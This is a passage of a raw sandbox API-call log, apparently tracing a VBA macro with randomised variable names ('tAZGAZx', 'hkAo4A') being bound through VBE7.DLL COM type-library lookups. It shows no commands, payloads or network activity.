lpMultiByteStr=0x3ba26fe, cbMultiByte=8, lpWideCharStr=0x144ea0, cchWideChar=9 | out: lpWideCharStr="tAZGAZx") returned 8 [0068.455] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="tAZGAZx", lHashVal=0x100d48, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.456] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba26fe, cbMultiByte=8, lpWideCharStr=0x144ea0, cchWideChar=9 | out: lpWideCharStr="tAZGAZx") returned 8 [0068.456] ITypeComp:RemoteBind (in: This=0x665bd30, szName="tAZGAZx", lHashVal=0x100d48, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.456] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="tAZGAZx") returned 0x100d48 [0068.456] strcpy_s (in: _Dst=0x144e00, _DstSize=0x8, _Src="tAZGAZx" | out: _Dst="tAZGAZx") returned 0x0 [0068.456] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e00, cbMultiByte=8, lpWideCharStr=0x144c50, cchWideChar=8 | out: lpWideCharStr="tAZGAZx") returned 8 [0068.456] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.456] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="tAZGAZx", lHashVal=0x100d48, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.456] IUnknown:Release (This=0x665ba50) returned 0xb [0068.456] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.456] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="tAZGAZx", lHashVal=0x100d48, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.456] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.456] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.456] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="tAZGAZx", lHashVal=0x100d48, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.456] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.456] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.456] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="tAZGAZx", lHashVal=0x100d48, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.456] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.456] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba26fe, cbMultiByte=8, lpWideCharStr=0x144ea0, cchWideChar=9 | out: lpWideCharStr="tAZGAZx") returned 8 [0068.456] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="tAZGAZx", lHashVal=0x100d48, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.456] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d60 [0068.456] _mbscpy_s (in: _Dst=0x67c2d60, _DstSizeInBytes=0x8, _Src=0x3ba26fe | out: _Dst=0x67c2d60) returned 0x0 [0068.456] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_tAZGAZx") returned 0x1010cc [0068.456] strcpy_s (in: _Dst=0x144fb0, _DstSize=0xf, _Src="_B_var_tAZGAZx" | out: _Dst="_B_var_tAZGAZx") returned 0x0 [0068.456] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144fb0, cbMultiByte=15, lpWideCharStr=0x144e00, cchWideChar=15 | out: lpWideCharStr="_B_var_tAZGAZx") returned 15 [0068.456] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.456] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_tAZGAZx", lHashVal=0x1010cc, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.457] IUnknown:Release (This=0x665ba50) returned 0xb [0068.457] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.457] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_tAZGAZx", lHashVal=0x1010cc, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.457] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.457] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.457] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_tAZGAZx", lHashVal=0x1010cc, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.457] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.457] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.457] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_tAZGAZx", lHashVal=0x1010cc, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.457] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.457] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.457] IUnknown:Release (This=0x665ba50) returned 0xb [0068.457] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc1b1a, cbMultiByte=15, lpWideCharStr=0x144e60, cchWideChar=16 | out: lpWideCharStr="_B_var_tAZGAZx") returned 15 [0068.457] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_tAZGAZx", lHashVal=0x1010cc, wFlags=0x3, ppTInfo=0x144e18, pDescKind=0x144e2c, ppFuncDesc=0x144e30, ppVarDesc=0x74005f00720061, ppTypeComp=0x41004700000000, pDummy=0x0 | out: ppTInfo=0x144e18*=0x0, pDescKind=0x144e2c*=0, ppFuncDesc=0x144e30, ppVarDesc=0x74005f00720061, ppTypeComp=0x41004700000000, pDummy=0x0) returned 0x0 [0068.457] _mbscpy_s (in: _Dst=0x145020, _DstSizeInBytes=0x8, _Src=0x3ba26fe | out: _Dst=0x145020) returned 0x0 [0068.457] ITypeComp:RemoteBind (in: This=0x665ba60, szName="hkAo4A", lHashVal=0x10f170, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.457] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2726, cbMultiByte=7, lpWideCharStr=0x144ea0, cchWideChar=8 | out: lpWideCharStr="hkAo4A") returned 7 [0068.457] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="hkAo4A", lHashVal=0x10f170, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.457] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2726, cbMultiByte=7, lpWideCharStr=0x144ea0, cchWideChar=8 | out: lpWideCharStr="hkAo4A") returned 7 [0068.457] ITypeComp:RemoteBind (in: This=0x665bd30, szName="hkAo4A", lHashVal=0x10f170, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.457] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="hkAo4A") returned 0x10f170 [0068.457] strcpy_s (in: _Dst=0x144e00, _DstSize=0x7, _Src="hkAo4A" | out: _Dst="hkAo4A") returned 0x0 [0068.457] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e00, cbMultiByte=7, lpWideCharStr=0x144c50, cchWideChar=7 | out: lpWideCharStr="hkAo4A") returned 7 [0068.458] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.458] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="hkAo4A", lHashVal=0x10f170, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.458] IUnknown:Release (This=0x665ba50) returned 0xb [0068.458] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.458] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="hkAo4A", lHashVal=0x10f170, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.458] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.458] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.458] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="hkAo4A", lHashVal=0x10f170, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.458] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.458] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.458] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="hkAo4A", lHashVal=0x10f170, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.458] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.458] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2726, cbMultiByte=7, lpWideCharStr=0x144ea0, cchWideChar=8 | out: lpWideCharStr="hkAo4A") returned 7 [0068.458] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="hkAo4A", lHashVal=0x10f170, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.458] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d60 [0068.458] _mbscpy_s (in: _Dst=0x67c2d60, _DstSizeInBytes=0x7, _Src=0x3ba2726 | out: _Dst=0x67c2d60) returned 0x0 [0068.458] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_hkAo4A") returned 0x106bda [0068.458] strcpy_s (in: _Dst=0x144fb0, _DstSize=0xe, _Src="_B_var_hkAo4A" | out: _Dst="_B_var_hkAo4A") returned 0x0 [0068.458] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144fb0, cbMultiByte=14, lpWideCharStr=0x144e00, cchWideChar=14 | out: lpWideCharStr="_B_var_hkAo4A") returned 14 [0068.458] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.458] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_hkAo4A", lHashVal=0x106bda, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.458] IUnknown:Release (This=0x665ba50) returned 0xb [0068.458] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.458] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_hkAo4A", lHashVal=0x106bda, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.458] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.458] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.458] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_hkAo4A", lHashVal=0x106bda, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.458] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.458] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.458] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_hkAo4A", lHashVal=0x106bda, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.459] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.459] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.459] IUnknown:Release (This=0x665ba50) returned 0xb [0068.459] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc1b4a, cbMultiByte=14, lpWideCharStr=0x144e60, cchWideChar=15 | out: lpWideCharStr="_B_var_hkAo4A") returned 14 [0068.459] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_hkAo4A", lHashVal=0x106bda, wFlags=0x3, ppTInfo=0x144e18, pDescKind=0x144e2c, ppFuncDesc=0x144e30, ppVarDesc=0x68005f00720061, ppTypeComp=0x34006f00000000, pDummy=0x0 | out: ppTInfo=0x144e18*=0x0, pDescKind=0x144e2c*=0, ppFuncDesc=0x144e30, ppVarDesc=0x68005f00720061, ppTypeComp=0x34006f00000000, pDummy=0x0) returned 0x0 [0068.459] _mbscpy_s (in: _Dst=0x145020, _DstSizeInBytes=0x7, _Src=0x3ba2726 | out: _Dst=0x145020) returned 0x0 [0068.459] _mbscpy_s (in: _Dst=0x67c2d60, _DstSizeInBytes=0x4, _Src=0x34d2d3a | out: _Dst=0x67c2d60) returned 0x0 [0068.459] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Hex") returned 0x1055b0 [0068.459] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.459] IUnknown:Release (This=0x665ba50) returned 0xb [0068.459] IUnknown:AddRef (This=0xaf0b528) returned 0x4 [0068.459] IUnknown:Release (This=0xaf0b528) returned 0x3 [0068.459] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1450f8 | out: ppvObject=0x1450f8*=0x0) returned 0x80004002 [0068.459] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1450f0 | out: ppvObject=0x1450f0*=0x0) returned 0x80004002 [0068.459] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d60) [0068.459] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x144930, pIndex=0x0 | out: ppTLib=0x144930*=0x665ba50, pIndex=0x0) returned 0x0 [0068.459] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144940, pDummy=0x0 | out: ppTLibAttr=0x144940, pDummy=0x0) returned 0x0 [0068.459] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.459] IUnknown:Release (This=0x665ba50) returned 0xb [0068.459] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x144930, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.459] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.459] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144930, pbstrName=0x0, pwOrdinal=0x144950 | out: pBstrDllName=0x144930*=0x0, pbstrName=0x0, pwOrdinal=0x144950*=0x4bc0) returned 0x0 [0068.459] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144930, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144930, pwOrdinal=0x500000000) returned 0x0 [0068.460] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x67c2d60 [0068.460] _mbscpy_s (in: _Dst=0x67c2d60, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d60) returned 0x0 [0068.460] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0068.460] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.460] IUnknown:Release (This=0x665ba50) returned 0xb [0068.460] IUnknown:AddRef (This=0xaf0b528) returned 0x4 [0068.460] IUnknown:Release (This=0xaf0b528) returned 0x3 [0068.460] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1450f8 | out: ppvObject=0x1450f8*=0x0) returned 0x80004002 [0068.460] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1450f0 | out: ppvObject=0x1450f0*=0x0) returned 0x80004002 [0068.460] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d60) [0068.460] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x144930, pIndex=0x0 | out: ppTLib=0x144930*=0x665ba50, pIndex=0x0) returned 0x0 [0068.460] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144940, pDummy=0x0 | out: ppTLibAttr=0x144940, pDummy=0x0) returned 0x0 [0068.460] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.460] IUnknown:Release (This=0x665ba50) returned 0xb [0068.460] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x144930, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.460] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.460] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144930, pbstrName=0x0, pwOrdinal=0x144950 | out: pBstrDllName=0x144930*=0x0, pbstrName=0x0, pwOrdinal=0x144950*=0x4bc0) returned 0x0 [0068.460] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144930, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144930, pwOrdinal=0x500000000) returned 0x0 [0068.460] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x67c2d60 [0068.460] _mbscpy_s (in: _Dst=0x67c2d60, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d60) returned 0x0 [0068.460] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0068.460] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.460] IUnknown:Release (This=0x665ba50) returned 0xb [0068.460] IUnknown:AddRef (This=0xaf0b528) returned 0x4 [0068.461] IUnknown:Release (This=0xaf0b528) returned 0x3 [0068.461] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1450f8 | out: ppvObject=0x1450f8*=0x0) returned 0x80004002 [0068.461] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1450f0 | out: ppvObject=0x1450f0*=0x0) returned 0x80004002 [0068.461] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d60) [0068.461] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x144930, pIndex=0x0 | out: ppTLib=0x144930*=0x665ba50, pIndex=0x0) returned 0x0 [0068.461] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144940, pDummy=0x0 | out: ppTLibAttr=0x144940, pDummy=0x0) returned 0x0 [0068.461] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.461] IUnknown:Release (This=0x665ba50) returned 0xb [0068.461] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x144930, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.461] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.461] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144930, pbstrName=0x0, pwOrdinal=0x144950 | out: pBstrDllName=0x144930*=0x0, pbstrName=0x0, pwOrdinal=0x144950*=0x4bc0) returned 0x0 [0068.461] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144930, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144930, pwOrdinal=0x500000000) returned 0x0 [0068.461] IUnknown:AddRef (This=0xaf0b6e0) returned 0x4 [0068.461] IUnknown:Release (This=0xaf0b6e0) returned 0x3 [0068.461] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1450f8 | out: ppvObject=0x1450f8*=0x0) returned 0x80004002 [0068.461] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1450f0 | out: ppvObject=0x1450f0*=0x0) returned 0x80004002 [0068.461] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x144930, pIndex=0x0 | out: ppTLib=0x144930*=0x665ba50, pIndex=0x0) returned 0x0 [0068.461] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144940, pDummy=0x0 | out: ppTLibAttr=0x144940, pDummy=0x0) returned 0x0 [0068.461] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.461] IUnknown:Release (This=0x665ba50) returned 0xb [0068.461] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x144930, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.461] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.461] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144930, pbstrName=0x0, pwOrdinal=0x144950 | out: pBstrDllName=0x144930*=0x0, pbstrName=0x0, pwOrdinal=0x144950*=0x4bc0) returned 0x0 [0068.462] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144930, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144930, pwOrdinal=0x500000000) returned 0x0 [0068.462] IUnknown:AddRef (This=0xaf0b6e0) returned 0x4 [0068.462] IUnknown:Release (This=0xaf0b6e0) returned 0x3 [0068.462] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1450f8 | out: ppvObject=0x1450f8*=0x0) returned 0x80004002 [0068.462] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1450f0 | out: ppvObject=0x1450f0*=0x0) returned 0x80004002 [0068.462] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x144930, pIndex=0x0 | out: ppTLib=0x144930*=0x665ba50, pIndex=0x0) returned 0x0 [0068.462] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144940, pDummy=0x0 | out: ppTLibAttr=0x144940, pDummy=0x0) returned 0x0 [0068.462] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.462] IUnknown:Release (This=0x665ba50) returned 0xb [0068.462] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x144930, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.462] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.462] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144930, pbstrName=0x0, pwOrdinal=0x144950 | out: pBstrDllName=0x144930*=0x0, 